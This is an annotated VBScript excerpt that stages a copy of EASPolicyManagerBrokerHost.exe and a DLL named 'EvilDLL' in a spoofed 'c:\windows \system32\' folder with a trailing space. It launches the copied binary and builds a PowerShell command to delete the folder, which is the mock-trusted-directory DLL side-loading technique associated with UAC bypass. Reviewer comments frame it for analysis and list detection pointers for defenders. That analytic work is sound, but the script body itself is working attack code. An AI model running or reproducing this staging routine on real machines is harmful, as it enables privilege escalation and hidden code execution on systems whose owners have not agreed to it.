' Purpose (as far as this excerpt shows): stage a copy of a Windows binary plus
' two DLLs in a look-alike "c:\windows \system32\" tree, launch the copied
' binary from there, and build a PowerShell command that removes the tree.
' NOTE(review): the trailing-space directory and the "EvilDLL" constant match
' the publicly documented "mock trusted directory" DLL side-loading pattern;
' whether the target binary auto-elevates is not shown here, so confirm before
' classifying this as a UAC bypass.
' Detection pointers for defenders:
'   - creation of a directory whose name is "windows" plus trailing whitespace
'   - process image paths or DLL loads containing "\windows \system32\"
'   - powershell command lines that delete a "\\?\"-prefixed path
Set oFSO = CreateObject("Scripting.FileSystemObject")
Set wshshell = wscript.createobject("WScript.Shell")
' Get target binary and payload
' All source paths are relative (".\"), so they resolve against the script's
' current working directory.
Const strBinary = "EASPolicyManagerBrokerHost.exe"
Const binaryPath = ".\EASPolicyManagerBrokerHost.exe"
' Two DLLs are staged: one under the name InprocLogger.dll and one renamed with
' a trailing underscore. Presumably the first forwards to the second; verify
' against the DLLs themselves, which are not part of this excerpt.
Const OriginalDLL = ".\InprocLogger_.dll"
Const EvilDLL = ".\InprocLogger.dll"
' Note the space after "windows": this is a different directory from
' c:\windows\, even though it renders almost identically in logs and UIs.
Const target = "c:\windows \"
target_sys32 = (target & "system32\")
target_binary = (target_sys32 & strBinary)
' Create the look-alike tree only if it is missing; the parent must exist
' before the system32 child can be created.
If Not oFSO.FolderExists(target) Then oFSO.CreateFolder target End If
If Not oFSO.FolderExists(target_sys32) Then oFSO.CreateFolder target_sys32 End If
' Copy legit binary and evil DLLs
' The binary is copied to a full file path; the DLLs are copied into the
' folder (destination ends with "\"), keeping their source file names.
oFSO.CopyFile binaryPath, target_binary
oFSO.CopyFile EvilDLL, target_sys32
oFSO.CopyFile OriginalDLL, target_sys32
' Launch the staged copy; the path is wrapped in literal double quotes because
' it contains a space. The process image path will contain "\windows \".
wshshell.Run("""" & target_binary & """")
' Deletion using VBScript is problematic, use PowerShell instead
' The "\\?\" prefix hands the path to the file system without Win32 path
' normalisation, which would otherwise drop the trailing space in the name.
' Only the command string is built here; its execution is not visible in this
' excerpt.
command ="powershell /c ""rm -r """"\\?\" & target & """"""""